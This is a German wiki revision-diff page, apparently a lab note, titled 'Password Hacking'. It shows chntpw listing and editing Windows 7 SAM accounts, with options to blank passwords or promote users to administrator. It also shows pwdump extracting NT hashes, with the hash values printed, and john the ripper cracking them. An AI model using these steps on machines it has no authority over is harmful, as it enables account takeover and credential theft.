Password Hacking: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) |
Thomas (Diskussion | Beiträge) |
||
| Zeile 1: | Zeile 1: | ||
=Windows 7= | =Windows 7= | ||
==chntpw== | ==chntpw== | ||
| + | ===list=== | ||
*chntpw -l SAM | *chntpw -l SAM | ||
<pre> | <pre> | ||
| Zeile 17: | Zeile 18: | ||
</pre> | </pre> | ||
| + | ===edit=== | ||
| + | *chntpw -u xinux SAM | ||
| + | <pre> | ||
| + | chntpw version 1.00 140201, (c) Petter N Hagen | ||
| + | Hive <SAM> name (from header): <\SystemRoot\System32\Config\SAM> | ||
| + | ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c <lf> | ||
| + | File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage) | ||
| + | Used for data: 291/56144 blocks/bytes, unused: 18/9136 blocks/bytes. | ||
| + | |||
| + | ================= USER EDIT ==================== | ||
| + | |||
| + | RID : 1004 [03ec] | ||
| + | Username: xinux | ||
| + | fullname: xinux | ||
| + | comment : | ||
| + | homedir : | ||
| + | |||
| + | 00000220 = Administratoren (which has 4 members) | ||
| + | 000003ed = HomeUsers (which has 2 members) | ||
| + | |||
| + | Account bits: 0x0010 = | ||
| + | [ ] Disabled | [ ] Homedir req. | [ ] Passwd not req. | | ||
| + | [ ] Temp. duplicate | [X] Normal account | [ ] NMS account | | ||
| + | [ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act | | ||
| + | [ ] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) | | ||
| + | [ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) | | ||
| + | |||
| + | Failed login count: 0, while max tries is: 0 | ||
| + | Total login count: 14 | ||
| + | |||
| + | - - - - User Edit Menu: | ||
| + | 1 - Clear (blank) user password | ||
| + | (2 - Unlock and enable user account) [seems unlocked already] | ||
| + | 3 - Promote user (make user an administrator) | ||
| + | 4 - Add user to a group | ||
| + | 5 - Remove user from a group | ||
| + | q - Quit editing user, back to user select | ||
| + | </pre> | ||
==john the ripper== | ==john the ripper== | ||
Version vom 15. Oktober 2015, 10:51 Uhr
Windows 7
chntpw
list
- chntpw -l SAM
chntpw version 1.00 140201, (c) Petter N Hagen Hive <SAM> name (from header): <\SystemRoot\System32\Config\SAM> ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c <lf> File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage) Used for data: 291/56144 blocks/bytes, unused: 18/9136 blocks/bytes. | RID -|---------- Username ------------| Admin? |- Lock? --| | 01f4 | Administrator | ADMIN | dis/lock | | 01f5 | Gast | | dis/lock | | 03e9 | Jan | ADMIN | | | 03ee | thomas | ADMIN | | | 03ec | xinux | ADMIN | |
edit
- chntpw -u xinux SAM
chntpw version 1.00 140201, (c) Petter N Hagen Hive <SAM> name (from header): <\SystemRoot\System32\Config\SAM> ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c <lf> File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage) Used for data: 291/56144 blocks/bytes, unused: 18/9136 blocks/bytes. ================= USER EDIT ==================== RID : 1004 [03ec] Username: xinux fullname: xinux comment : homedir : 00000220 = Administratoren (which has 4 members) 000003ed = HomeUsers (which has 2 members) Account bits: 0x0010 = [ ] Disabled | [ ] Homedir req. | [ ] Passwd not req. | [ ] Temp. duplicate | [X] Normal account | [ ] NMS account | [ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act | [ ] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) | [ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) | Failed login count: 0, while max tries is: 0 Total login count: 14 - - - - User Edit Menu: 1 - Clear (blank) user password (2 - Unlock and enable user account) [seems unlocked already] 3 - Promote user (make user an administrator) 4 - Add user to a group 5 - Remove user from a group q - Quit editing user, back to user select
john the ripper
- cd /mnt/Windows(System32/config
- cp SAM SYSTEM /root
- cd /root
- pwdump SYSTEM SAM > hash.txt
- root@kali:~# cat hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:94aa68f72ab39cfec7ffcb58dca3358c::: Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Jan:1001:aad3b435b51404eeaad3b435b51404ee:18af5f2d758336eade8dd06361c6acc2::: xinux:1004:aad3b435b51404eeaad3b435b51404ee:912b772615d5d5c2619ea89650f923f6::: thomas:1006:aad3b435b51404eeaad3b435b51404ee:912b772615d5d5c2619ea89650f923f6::
- john hash.txt -format=nt2 -users=xinux